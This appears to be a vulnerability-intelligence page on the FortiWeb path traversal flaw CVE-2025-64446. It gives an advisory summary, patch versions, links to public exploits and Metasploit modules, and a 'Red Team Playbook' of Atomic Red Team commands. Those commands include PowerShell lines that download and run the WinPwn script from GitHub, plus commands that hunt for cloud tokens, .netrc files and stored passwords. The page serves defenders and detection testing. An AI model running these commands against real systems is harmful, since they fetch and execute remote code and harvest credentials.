CVE-2025-64446
Overview
This vulnerability is a relative path traversal flaw in the Fortinet FortiWeb web application firewall. It arises from improper validation of user-supplied input in HTTP/HTTPS requests, specifically within the API endpoint handling administrative system configurations. The flaw allows crafted requests to traverse directories and access restricted CGI scripts, bypassing normal access controls in the affected FortiWeb versions.
Vulnerability Description
A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests.
Impact
An unauthenticated attacker can remotely execute administrative commands on the FortiWeb system, including creating new privileged administrative users. This results in full system compromise, allowing control over the web application firewall and potentially the protected network. No prior authentication or user interaction is required, enabling immediate unauthorized access and persistent control over the device, which can lead to data breaches, service disruption, and lateral movement within the network.
Solution
Fortinet has released security updates addressing this vulnerability in FortiWeb versions 8.0.2 and later, 7.6.5 and later, 7.4.10 and later, 7.2.12 and later, and 7.0.12 and later. Administrators should apply these patches promptly. Detailed patch instructions and advisory information are available at Fortinet’s PSIRT page: https://fortiguard.fortinet.com/psirt/FG-IR-25-910. No specific workarounds are recommended other than timely application of vendor-supplied fixes.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A critical vulnerability exists within Fortinet's FortiWeb application firewall that allows for relative path traversal, which can be exploited through crafted HTTP or HTTPS requests. This flaw is present in multiple versions of FortiWeb, including the latest iterations, and enables attackers to manipulate file paths in a way that can lead to unauthorized access to sensitive files or execution of administrative commands. The nature of this vulnerability stems from improper validation of user-supplied input, allowing an attacker to traverse directories and potentially execute commands that should be restricted to privileged users. This flaw poses a significant risk, as it can compromise the integrity and confidentiality of the system.
The attack vectors for this vulnerability are primarily web-based, relying on the ability to send specially crafted requests to the FortiWeb firewall. An attacker could exploit this flaw by embedding malicious payloads within the request, targeting the firewall's internal file structure. For instance, by manipulating the request parameters, an attacker could gain access to configuration files or execute commands that alter the firewall's behavior. This could lead to further exploitation of the network, as the attacker could leverage the compromised firewall to launch attacks against other systems or exfiltrate sensitive data. The ease of exploitation, combined with the potential for significant impact, makes this vulnerability particularly concerning.
In terms of real-world impact, the consequences of exploiting this vulnerability can be severe. Organizations relying on FortiWeb for web application security may find themselves exposed to data breaches, loss of customer trust, and regulatory penalties. The ability to execute administrative commands could allow an attacker to disable security features, modify access controls, or even deploy additional malware within the network. The business risk associated with such an incident includes not only immediate financial losses but also long-term reputational damage and potential legal ramifications. Given the high CVSS score of 9.8, organizations must prioritize addressing this vulnerability to safeguard their assets.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating FortiWeb to the latest patched versions is essential, as vendors typically release fixes for known vulnerabilities. Additionally, organizations should employ intrusion detection systems (IDS) that can identify and alert on suspicious HTTP requests indicative of exploitation attempts. Conducting regular security assessments and penetration testing can also help identify weaknesses in the configuration and deployment of FortiWeb. Furthermore, implementing strict input validation and sanitization measures can reduce the risk of exploitation by ensuring that user-supplied data is properly handled.
In conclusion, the relative path traversal vulnerability in Fortinet's FortiWeb poses a significant threat to organizations that rely on this technology for web application security. The potential for unauthorized access and command execution highlights the need for immediate action to mitigate risks. By adopting proactive detection and mitigation strategies, organizations can protect themselves from the severe consequences associated with this vulnerability, ensuring the integrity and security of their web applications and underlying infrastructure.
CSURFACE threat intelligence has identified the publication of new exploit entries on ExploitDB targeting CVE-2025-64446, marking a significant expansion in the exploit landscape for this critical Fortinet FortiWeb vulnerability. Concurrently, our telemetry indicates a notable reduction in detection activity, suggesting adversaries may be shifting tactics or employing more stealthy exploitation methods. The availability of multiple new proof-of-concept exploits and scanning tools on public repositories further lowers the barrier for attackers to weaponize this vulnerability. This development elevates the overall risk posture, as the EPSS score has increased, reflecting a growing likelihood of exploitation in the wild. Although ransomware groups previously linked to this vulnerability remain unconfirmed in active campaigns, the enhanced exploit accessibility and evolving attacker behavior underscore an increased threat level that defenders must monitor closely.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Fortinet FortiWeb create new local admin
auxiliary/admin/http/fortinet_fortiweb_create_admin
|
Defused, sfewer-r7 | Unknown | - | View |
|
Fortinet FortiWeb unauthenticated RCE
exploits/linux/http/fortinet_fortiweb_rce
|
Defused, sfewer-r7 | Unknown | - | View |
ExploitDB (2)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| FortiWeb 8.0.2 - Remote Code Execution | Mohammed Idrees Banyamer | webapps | multiple | - | View |
| Fortinet FortiWeb v8.0.1 - Auth Bypass | nu11secur1ty | webapps | multiple | - | View |
GitHub PoCs (13)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
sensepost/CVE-2025-64446
A scanner for the FortiNet vulnerability CVE-2025-64446
|
sensepost | 30 | 6 | 2025-11-17 | View |
|
lincemorado97/CVE-2025-64446_CVE-2025-58034
FortiWeb Remote Code Execution (RCE) Exploit via CVE-2025-64446 + CVE-2025-58034 Chain
|
lincemorado97 | 14 | 5 | 2025-11-18 | View |
|
soltanali0/CVE-2025-64446-Exploit
|
soltanali0 | 13 | 5 | 2025-11-15 | View |
|
sxyrxyy/CVE-2025-64446-FortiWeb-CGI-Bypass-PoC
|
sxyrxyy | 13 | 2 | 2025-11-14 | View |
|
fevar54/CVE-2025-64446-PoC---FortiWeb-Path-Traversal
# CVE-2025-64446 PoC - FortiWeb Path Traversal Proof of Concept para la vulnerabilidad de path traversal en Fortinet Fo...
|
fevar54 | 7 | 0 | 2025-11-14 | View |
|
verylazytech/CVE-2025-64446
CVE-2025-64446 - A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 throug...
|
verylazytech | 3 | 0 | 2025-11-17 | View |
|
AN5I/cve-2025-64446-fortiweb-exploit
Security research tool for detecting and testing CVE-2025-64446 (FortiWeb Path Traversal RCE vulnerability)
|
AN5I | 1 | 2 | 2025-11-21 | View |
|
litndat/Vulnerability-CVE-2025-64446-CVE-2025-58034
Lỗ hổng FORTIWEB_CVE-2025-64446 & CVE-2025-58034
|
litndat | 0 | 0 | 2026-06-24 | View |
|
Death112233/CVE-2025-64446-
|
Death112233 | 0 | 0 | 2025-11-19 | View |
|
D3crypT0r/CVE-2025-64446
FortiWeb Unauthenticated RCE via Path Traversal & CGI Auth Bypass
|
D3crypT0r | 0 | 0 | 2025-11-17 | View |
|
lequoca/fortinet-fortiweb-cve-2025-64446-58034
Security research on Fortinet FortiWeb vulnerabilities (CVE-2025-64446, CVE-2025-58034)
|
lequoca | 0 | 0 | 2025-12-21 | View |
|
eagle-nett/FORTIWEB_CVE-2025-64446-58034
Lỗ hổng CVE-2025-64446 & CVE-2025-58034
|
eagle-nett | 0 | 0 | 2026-03-22 | View |
|
0xBlackash/CVE-2025-64446
CVE-2025-64446
|
0xBlackash | 0 | 0 | 2026-03-26 | View |
Threat Feed
36 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-139 | Relative Path Traversal |
47%
|
High | High | |
| CAPEC-76 | Manipulating Web Input to File System Calls |
37%
|
High | Very High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-64446 |
| fortiguard.fortinet.com |
GitHub CVE
|
https://fortiguard.fortinet.com/psirt/FG-IR-25-910 |
| github.com |
NVD API
Exploit
Third Party Advisory
|
https://github.com/watchtowrlabs/watchTowr-vs-Fortiweb-AuthBypass |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-64446 |